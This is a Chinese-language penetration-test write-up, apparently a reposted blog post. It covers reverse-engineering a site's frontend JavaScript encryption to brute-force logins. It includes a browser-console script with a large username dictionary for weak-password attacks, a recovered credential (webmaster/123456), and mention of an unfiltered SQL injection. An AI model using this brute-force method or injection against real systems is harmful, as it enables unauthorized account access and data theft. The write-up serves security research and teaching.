记一次前端js加解密泄露引发的漏洞
前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请私聊删除。还在学怎么挖通用漏洞和src吗?知识星球在最下方,续费也有优惠私聊~~考安全证书请联系vx咨询。
输入用户名密码,点击登录以后会抓到一个如下登录数据包:
请求路径为/log_in,传参为加密的param
追踪方法,发现xs_strEnccs又调用了strEnc方法,而解密参数的方法名称为xs_strDec
点击忘记密码跳转到其他页面,观察js代码
在该找回密码页面中,可以找到strEnc方法,这个方法正式对密文进行加密的子方法
这样到这一步,完整的加密方法都理清楚了,大致步骤如下
xs_strEnccs调用了strEnc,传参为登录字符串,还有654321登录时候也没有验证码,可以构造用户名不唯一、密码默认为123456的登录字符串来进行弱口令爆破。比如这样的:
username=xxx&password=123456&rootsrc=3
为了图方便,我写了一个可以直接在浏览器控制台输出加密param的脚本,将最简单的弱口令密码本在控制台中进行加密转换为密文:
const usernames = ["admin", "test", "test01", "test1", "test2", "weblogic", "ftp", "manager", "manage", "user", "guest", "administrator","account", "super", "superuser", "master", "imap", "memcached", "mongodb", "oracle", "pop3", "postgresql", "rdp","redis", "smb", "smtp", "sqlserver", "ssh", "svn", "telnet", "tomcat", "vnc", "xiaomi", "huawei", "apple", "topsec","360", "qihoo", "1688", "aliyun", "alipay", "www", "web", "webadmin", "webmaster", "anonymous", "jboss", "1", "admin1","root", "sever", "system", "develop", "developer", "developers", "development", "demo", "device", "devserver", "devsql","0", "01", "02", "03", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "2", "20", "3", "3com", "4", "5","6", "7", "8", "9", "ILMI", "a", "zhangwei", "wangwei", "wangfang", "liwei", "lina", "zhangmin", "lijing", "wangjing","liuwei", "wangxiuying", "zhangli", "lixiuying", "wangli", "zhangjing", "zhangxiuying", "liqiang", "wangmin", "limin","wanglei", "liuyang", "wangyan", "wangyong", "lijun", "zhangyong", "lijie", "zhangjie", "zhanglei", "wangqiang", "lijuan","wangjun", "zhangyan", "zhangtao", "wangtao", "liyan", "wangchao", "liming", "liyong", "wangjuan", "liujie", "liumin", "lixia","lili", "zhangjun", "wangjie", "zhangqiang", "wangxiulan", "wanggang", "wangping", "liufang", "liuyan", "liujun", "liping","wanghui", "chenjing", "liuyong", "liling", "liguiying", "wangdan", "ligang", "lidan", "wangpeng", "liutao", "chenwei","zhanghua", "liujing", "litao", "wangguiying", "zhangxiulan", "lihong", "lichao", "liuli", "zhangguiying", "wangyulan","zhangpeng", "lixiulan", "zhangchao", "wangling", "zhangling", "lihua", "wangfei", "zhangyulan", "wangguilan", "wangying","liuqiang", "chenxiuying", "liying", "lihui", "limei", "chenyong", "wang", "lifang", "zhangguilan", "libo", "yangyong","wangxia", "liguilan", "wangbin", "lipeng", "zhangping", "zhanghui", "zhangyu", "liuju", "xujing", "yanghong", "yangziwen", "zhangshulan", "zhangwen", "chenguilan", "zhouli", "lishuhua", "chen", "machao","liujianguo", "liguihua", "wangfenglan", "lishulan", "chenxiuzhen"];for (let i = 0; i < usernames.length; i++) {const result = 'username='+usernames[i]+'&password=123456&rootsrc=3' const result2 = xs_strEnccs(result); console.log(result2); }
调用现成的js里的加密函数进行加密,效果如下
加密完的字典之后,将登录的数据包直接转发到burp的intruder中替换参数进行爆破
爆破显示状态码为537时,登录成功,此时的param为
2D54C345E9883022B05FA18CDC024536EE4A58B6C5BBA9449ED0BAF1115B734923153A77E0449A6FC2CF1D90227EB5EE4D4C437553E62E12CA570C1934CE6FCC5D98631EB611684F6853A618AFAAF53267ADABEF2D9C279B
此时再在js中调用解密方法,解密弱口令如下:
webmaster/123456
但是直接输入账号密码webmaster/123456登录会报错,还需要传个参数rootsrc=3,这应该是另一种登录方式中存在的弱口令
所以登录时抓包,再替换数据包里面的param值,放包以后就能正常登录
最后成功以webmaster账户登录进入后台
接下来就是后台漏洞挖掘了
登录成功webmaster后,可以发现一个后台接口存在注入,这里没存截图只有个数据包,完全没有过滤的注入
参数classname存在注入,使用sqlmap进行验证数据包,后端数据库为Oracle
测试结束
原文始发于微信公众号(不秃头的安全):记一次前端js加解密泄露引发的漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论